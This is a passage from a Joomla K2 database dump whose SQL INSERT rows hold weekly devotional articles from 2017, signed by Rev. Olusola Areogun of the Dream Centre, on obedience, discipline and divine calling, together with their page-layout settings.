'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(47, 'From our Father\'s Heart (7/05/2017)', 'from-our-father-s-heart-7-05-2017', 5, 1, '<p>Dearly Beloved, </p>\r\n<p>Live Up To Your Calling! </p>\r\n<p>Raise your life to the level of your calling. Don\'t continue living at the level of your convenience. Jack up your life to the level of God\'s mandate over your life. Whether you like it or not, there is a divine call and mandate of heaven over your life that you must give account for when you come face-to-face with the Father in eternity and you need to raise your life to the level of that divine mandate. </p>\r\n', '\r\n<p>Many believers are living lower than the call of God upon their lives. They know they are called, they have a sense of the call, but have however chosen to stay at convenience level where their lives are not being driven and harnessed in accordance with the capacity that God has placed within them. </p>\r\n<p>Beloved, the devil only recognizes you in the call and you are only untouchable to the enemy when you are living at the level of God\'s call over your life. It is your active operation in the calling that silences and terrifies the enemy. That is why he tries to batter people and make them unfit for destiny before they discover. However, you are privileged of God to be trained for your destiny and calling. Therefore, embrace it and jack up your life to the level of God\'s call for you. </p>\r\n<p>There are two names a man bears:</p>\r\n<p>1. The name men call you by virtue of your birth circumstances, problems or background.</p>\r\n<p>2. The name of your destiny that God has called you. That is the name you must discover and fulfill. </p>\r\n<p>You must make up your mind to discover that name and live by it. Heaven is expectant over your life and you must not disappoint. </p>\r\n<p>Till next week, go and win with Jesus. </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-05-07 16:09:00', 199, '', 0, '0000-00-00 00:00:00', '2018-08-24 15:17:01', 196, '2017-05-07 16:09:00', '0000-00-00 00:00:00', 0, 1, 19, 0, 0, '', '', '', '', 2377, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(49, 'From our Father\'s Heart (28/05/2017)', 'from-our-father-s-heart-28-05-2017', 5, 1, '<p>Dearly beloved of God,</p>\r\n<p>Embrace discipline! To be disciplined means to receive training that corrects you, moulds you, or perfects moral character and behaviour in you. It means adjusting inside to training. It means that you have accepted discipleship (that is, a set of values) and have internalised it such that it controls and affects your decisions.</p>\r\n', '\r\n<p>Discipline is what conditions your life for divine blessings to come into and remain there. Without discipline, your life becomes porous and open to all kinds of opportunistic demons to enter your life and affairs causing disorder and chaos. Undisciplined church members are the ones who are difficult to help; they are the ones that pastor had to pray for over and over again, they find it difficult to obey instructions and they eventually become victims of their own carelessness.  </p>\r\n<p>Indiscipline hinders angels from working, makes divine intervention difficult. Indiscipline wastes resources, time and energy. Indiscipline can reduce a man to a piece of bread. Discipline on the other hand makes you stronger, makes you mature, makes you richer, and makes you ready for life\'s matters and issues. Discipline makes you composed. </p>\r\n<p>An Undisciplined man has nothing in life; such a man is a disaster going somewhere to happen. The children and family of an undisciplined man will always suffer panic attacks, while the family of a disciplined man will always be at rest.  That\'s why in the Dream Centre we take you through several programmes in order to discipline your body, desires, emotions and appetites so that you can be fit for God\'s plan for your life and destiny. </p>\r\n<p>Discipline brings divine order into your life. Discipline is part of what is supplied to you as you embrace structure in church and align your life with it. Esau lost all that he had to his brother because of indiscipline. He was the heir by birth, he had the birthright but he could not discipline his appetites and desires. </p>\r\n<p>Beloved, you don\'t just eat every food that comes your way like Esau or jump at every cheap opportunity otherwise you might have consumed your destiny overnight. Discipline also brings dignity, respect and honour into your life. The most divinely respected people on earth are people who are disciplined; they may not be loved by all but they are respected. Indiscipline leads to shame and reproach. Accepting discipline may not be the easiest thing to do but there are great benefits when you accept it. </p>\r\n<p>The Dream Centre is a house of training, a place of divine discipleship that works Kingdom discipline into the fabric of your soul especially if you respond with the right heart. Make up your mind to take discipline; it is for your good and for the good of your destiny. </p>\r\n<p>Till next week, go and win with Jesus</p>\r\n<p>God\'s  Servant</p>\r\n<p>Rev. Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-05-28 11:18:00', 199, '', 0, '0000-00-00 00:00:00', '2017-06-25 11:25:01', 196, '2017-05-28 11:18:00', '0000-00-00 00:00:00', 0, 1, 21, 0, 0, '', '', '', '', 1915, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(50, 'Your obedience is what connects you to the supernatural - From our Father\'s Heart (04/06/2017)', 'from-our-father-s-heart-04-06-2017', 5, 1, '<p>Dearly Beloved, </p>\r\n<p>Your obedience is what connects you to the supernatural. Until you begin to take the issue of obeying God very serious you will keep being cut off from miracles and the supernatural. Perhaps you have kept wondering why you hardly experience miracles or it seems that the supernatural is not real because you don\'t experience it.</p>\r\n', '\r\n<p>The reason may not be far-fetched. Ask yourself: “Am I obeying God?” Since I came on the road of the calling, I can stand before the Master and tell Him I have obeyed everything I am sure He told me to do till date. That\'s why our experience is in the dimension of the supernatural in the Dream Centre. I encourage you to come on board in the road of obedience too and you will experience the supernatural.</p>\r\n<p>All through Scriptures we see men who obeyed and had miracles in their lives. From Naaman the leper who obeyed Elisha to dip seven times in Jordan (2 Kin. 5:1–14), to the servants that Mary the mother of Jesus instructed to obey whatever Jesus told them to do at the marriage feast at Cana (Joh. 2:5). Also remember the woman whose sons were to be enslaved but came to the man of God who told her what to do and she obeyed (2 Kin. 4:1–7). Peter also who toiled all night and caught nothing but at the word of the Master, Jesus, let down his net and had a return of the double boat (Luk. 5:4–7), even Peter who stepped out of the boat at the Master\'s word (Mat. 14:28:29). </p>\r\n<p>Beloved, your obedience is what connects you to the supernatural dimension. Until you start living an obedient life to Jesus, to the men He placed over you and the authorities over you, you may only hear of the supernatural and not experience it. So check your life today and see if there is any area of disobedience. Repent and start obeying. This is your season to walk on water but obedience is critical. May God help you in Jesus\' name. Amen.</p>\r\n<p>Till next week , go and win with Jesus</p>\r\n<p>God\'s Servant</p>\r\n<p>Rev. Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-06-04 11:25:00', 199, '', 0, '0000-00-00 00:00:00', '2017-06-25 13:03:35', 196, '2017-06-04 11:25:00', '0000-00-00 00:00:00', 0, 1, 22, 0, 0, '', '', '', '', 2211, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(51, 'God is Committed to Financing and Funding your Primary Purpose - From our Father\'s Heart (11/06/2017)', 'god-is-committed-to-financing-and-funding-your-primary-purpose-from-our-father-s-heart-11-06-2017', 5, 1, '<p>GOD IS COMMlTTED TO FINANCING AND FUNDING YOUR PRIMARY PURPOSE. </p>\r\n<p>Jeremiah l:S \"Before I formed thee in the belly I knew thee; and before thou camest forth out of the womb I sanctified thee, and I ordained thee a prophet unto the nations. \" </p>\r\n<p>In this kingdom, there are primary purposes as well as secondary purposes. The commitment of God in the life of a man is always towards the primary purpose of God.</p>\r\n', '\r\n<p>God will not fund and finance a secondary purpose to cancel His primary purpose in your life. The primary purposes of God are things connected to the program of God in a man\'s life, i.e. those things contributing to what God is doing in his generation. Every other things outside of that are secondary purposes. </p>\r\n<p>He told Jeremiah, ..... I ordained you a prophet unto the nations. If Jeremiah bad become anything outside of being a prophet of God, he would have failed because that was his primary purpose. The resources and allocations of Heaven are always in that direction.</p>\r\n<p>A lot of people face difficulties and struggle on the road of obedience because they have shifted their attention from the primary purpose  and divine funding and commitment has also been withdrawn from their lives. </p>\r\n<p>Joseph became the Prime Minister in Egypt but that was the secondary purpose. The primary purpose was to be a saviour and  preserver oflsrael and he understood that. That was why he enjoyed the commitment of Heaven. He focused on fulfilling the primary purpose and God did not mind him enjoying the secondary purpose. I told you, every position and platform God gives in life comes with two things:INFLUENCE and AFFLUENCE. The influence is the primary purpose while the affluence is the secondary purpose. God will not mind you enjoying the affluence once the influence has been correctly utilized.</p>\r\n<p>Beloved, what is the primary purpose of where you are right now? In that country, state or city, that place of authority, that position of power. Are you actually fulfilling the primary purpose of God there? You need to  answer that question today before it is too late. May be you are like Esther who God has allowed into the kingdom for such a time as this. Esther almost missed it but the voice of the father in her life; Mordecai helped  her and she got it right. She fulfilled the primary purpose of being a saviour of her people while enjoying the secondary purpose of being a queen in the land.  </p>\r\n<p>Jesus ow· Saviour knew what His primary purpose was, that is to die on the cross. Although, He did so many other things on His way to the  primary purpose like healing the sick, raising the dead but His primary purpose drove Him until He fulfilled that. 1 want you to check your life and see where exactly you are compromising or giving less attention to  your primary purpose and make necessary adjustments.</p>\r\n<p>Till next week, go and win with Jesus. </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev. OlusolaAreogun. </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-06-11 12:16:04', 199, '', 196, '2017-06-25 13:13:33', '2017-06-25 13:03:02', 196, '2017-06-11 12:16:04', '0000-00-00 00:00:00', 0, 1, 23, 0, 0, '', '', '', '', 2395, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(52, 'If you are willing and obedient, you shall eat the good of the land - From our Father\'s Heart (18/06/2017)', 'if-you-are-willing-and-obedient-you-shall-eat-the-good-of-the-land-from-our-father-s-heart-18-06-2017', 5, 1, '<p>The Bible says if you are willing and obedient, you shall eat the good of the land. </p>\r\n<p>The root of problems between God and His people is divine instructions. Instruction is what keeps us within divine structure where our protection and prosperity is secured. </p>\r\n<p>Whenever you receive an instruction from the Lord, always commit yourself to obey. Delayed obedience usually becomes outright and eventual disobedience  to God.</p>\r\n', '\r\n<p> Disobedience to divine instruction was what caused Adam and Eve to lose their place in the garden of Eden. Every tragedy and problem in most people\'s lives today is not just the devil but it came as a result of one instruction or the other that was disobeyed, ignored, neglected or misunderstood. </p>\r\n<p>The greatest blessings from God comes when you obey divine instruction. Your provision for life and destiny are in the place of your obedience. For example, if I had followed my own desire and not obeyed God when He sent me to Ilesa on full time to earn N 10 per week, we would not be doing the ministry at the level we are today. I obeyed God, and we are all witnesses to His faithfulness today in my life and in the ministry. And as we continue, we shall meet with more of His faithfulness. </p>\r\n<p>God always rewards obedience to His instruction. If you study the Bible very well, everyone that crossed the path of God without redemption crossed it through disobedience to divine instructions. God took the kingdom from Saul because of that. That was what cost Eli his life and his two sons. Both of them died on the same day. You must understand that divine instructions are not to be taken lightly. </p>\r\n<p>Divine instructions can come to you through personal study of the word of God, in special meetings, or through His ordained servants to you. Take heed to them when they come and let them form the direction of your life. Don\'t be a Christian that gets carried away with the moves of God, and forgets the instructions that follow thereafter. Always write down your instructions, and go over them over and over until you have obeyed all without leaving anyone behind. </p>\r\n<p>YOUR PRESERVATION IS IN OBEDIENCE TO DIVINE INSTRUCTIONS. </p>\r\n<p>Till next week, go and win with Jesus. </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev. OlusolaAreogun. </p>', NULL, NULL, '[]', '', '2017-06-18 12:22:00', 199, '', 0, '0000-00-00 00:00:00', '2017-06-25 13:11:17', 196, '2017-06-18 12:22:00', '0000-00-00 00:00:00', 0, 1, 24, 0, 0, '', '', '', '', 4080, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(53, 'Embrace discipline! - From our Father\'s Heart (25/06/2017)', 'embrace-discipline-from-our-father-s-heart-25-06-2017', 5, 1, '<p>Embrace discipline! To be disciplined means to receive training that corrects you, moulds you, or perfects moral character and behaviour in you. It means adjusting inside to training. It means that you have accepted discipleship (that  is, a set of values) and have internalised it such that it controls and affects your decisions. </p>\r\n', '\r\n<p>Discipline is what conditions your life for divine blessings to come into and remain there. Without discipline, your life becomes porous and open to all kinds of opportunistic  demons to enter your life and affairs causing disorder and chaos. Undisciplined church members are the ones who are  difficult to help; they are the ones that pastor had to pray for Over and over again, they find it difficult to obey instructions  and they eventually become victims of their own carelessness. </p>\r\n<p>Indiscipline hinders angels from working, makes divine intervention difficult. Indiscipline wastes resources, time and energy. Indiscipline can reduce a man to a piece ofbread. Discipline on the other hand makes you stronger, makes you mature, makes you richer, and makes you ready for life\'s matters and issues. Discipline makes you composed. </p>\r\n<p>An Undisciplined man has nothing in life; such a man is a disaster going somewhere to happen. The children and  family of an undisciplined man will always suffer panic attacks, while the family of a disciplined man will always be at rest. That\'s why in the Dream Centre we take you through several programmes in order to discipline your body, desires, emotions and appetites so that you can be fit for God\'s plan for your life and destiny. </p>\r\n<p>Discipline brings divine order into your life. Discipline is part of what is supplied to you as you embrace structure in church and align your life with it. Esau lost all that he had to his brother because of indiscipline. He was the heir by birth, he had the birthright but he could not discipline his appetites and desires. </p>\r\n<p>Beloved, you don\'t just eat every food that comes your way like Esau or jump at every cheap opportunity otherwise you might have consumed your destiny overnight. Discipline also brings dignity, respect and honour into your life. The most divinely respected people on earth are people who are disciplined; they may not be loved by all but they are respected. Indiscipline leads to shame and reproach. Accepting discipline may not be the easiest thing to do but there are great benefits when you accept it. </p>\r\n<p>The Dream Centre is a house of training, a place of divine discipleship that works Kingdom discipline into the fabric of your soul especially if you respond with the right heart. Make up  your mind to take discipline; it is for your good and for the good of your destiny. </p>\r\n<p>Till next week, go and win with Jesus </p>\r\n<p>God\'s Servant </p>\r\n<p>Rev. OlusolaAreogun </p>', NULL, NULL, '[]', '', '2017-06-25 13:11:00', 199, '', 0, '0000-00-00 00:00:00', '2017-07-16 09:55:40', 196, '2017-06-25 13:11:18', '0000-00-00 00:00:00', 0, 1, 25, 0, 0, '', '', '', '', 3186, 